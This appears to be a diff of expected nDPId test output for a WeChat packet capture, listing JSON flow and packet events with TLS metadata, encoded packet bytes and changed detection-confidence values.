+00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zziP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s3iffY9XBpGE8EG39zicWNmnu8THVvBYw\/7ASp9iDFLWiJkigPswdmPFhkbbEWproj9M3h6bBS7Z9ohy6yUXPGG6RKTKX45Eg\/Pm2f3Y3bPQ15p4S5E260\/wYzmk6Pco8MZXXOtCrfsbgBU3U\/QFaYJziOi8kV14C9ocoOj7UNbOPlK4JGIThUQC22wBIoO4QcICqfGi12dFi3\/dZawWcVCDgNfdmaRqjA7vn2Ew3dMX8AfiCfUGFCye6yKRfSC
\/KcvJGql1sIadq+izTaBp+jfWADKBhJTOB7x6VUd2Bs6qIc6mkvKSj4SxqM+NPNL5GVHDR9qjJ4H5zSi"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167355723,"flow_last_seen":1492167355723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167355723,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1492167355723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167355723,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8P4ZAAEAG1bbAqAFny82XotNLAbtsCoMeAAAAAKACchAveAAAAgQFtAQCCAoAMLyYAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":124,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353937,"flow_last_seen":1492167355743,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167355743,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":126,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353937,"flow_last_seen":1492167355744,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167355744,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167356077,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700uz8YPYbAqDH6ASN8iq2QAAAgQFoAQCCApFrUFyADC8mAEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167356077,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0P4dAAEAG1b3AqAFny82XotNLAbtsCoMfs\/GD2YAQAOUQHAAAAQEICgAwvPFFrUFy"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167355723,"flow_last_seen":1492167356077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167356077,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167355723,"flow_last_seen":1492167356488,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167356488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":153,"source":"wechat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167355723,"flow_last_seen":1492167356489,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167356489,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54091,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360622,"pkt":"eJKcD6iO8IQvSpdgCABFoABrfSgAADcGnizYOs1OwKgBZwG7ugsgLP3V+HJvr4AYAV2wggAAAQEICvap78EAL9cAFwMDADI7\/WDixcApjMc4oo49oFJiwuyoshtW5rSqz9ahoHcSOkzcmjO3CkNO6pgK6XLAf2uLNg=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360622,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360622,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360622,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1492167360626,"pkt":"eJKcD6iO8IQvSpdgCABFoABr4O8AADcGG8es2RdOwKgBZwG7z+SKJZg8+z2t2oAYAVTREQAAAQEICn7IL7IAL9cCFwMDADL\/QQeiav2tbjoNjgJzOU4UPNZPR4RzRuOQ+h3eXjLhIIWjbE1Sb3YuyocNPQRCTo9EPA=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360626,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167345896,"flow_last_seen":1492167360626,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":18,"midstream":1,"thread_ts_msec":1492167360626,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167366908,"flow_last_seen":1492167366908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167366908,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54092,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1492167366908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167366908,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8lZ5AAEAGf57AqAFny82XotNMAbt+X1IbAAAAAKACchBDOAAAAgQFtAQCCAoAMMeFAAAAAAEDAwc="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167367159,"flow_last_seen":1492167367159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167367159,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54093,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"wechat.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1492167367159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367159,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8UGVAAEAGxNfAqAFny82XotNNAbtphJemAAAAAKACchASSQAAAgQFtAQCCAoAMMfDAAAAAAEDAwc="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"wechat.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1492167367227,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167367227,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG700zSrc67fl9SHKASN8jkhQAAAgQFoAQCCApF0bHCADDHhQEDAwc="} 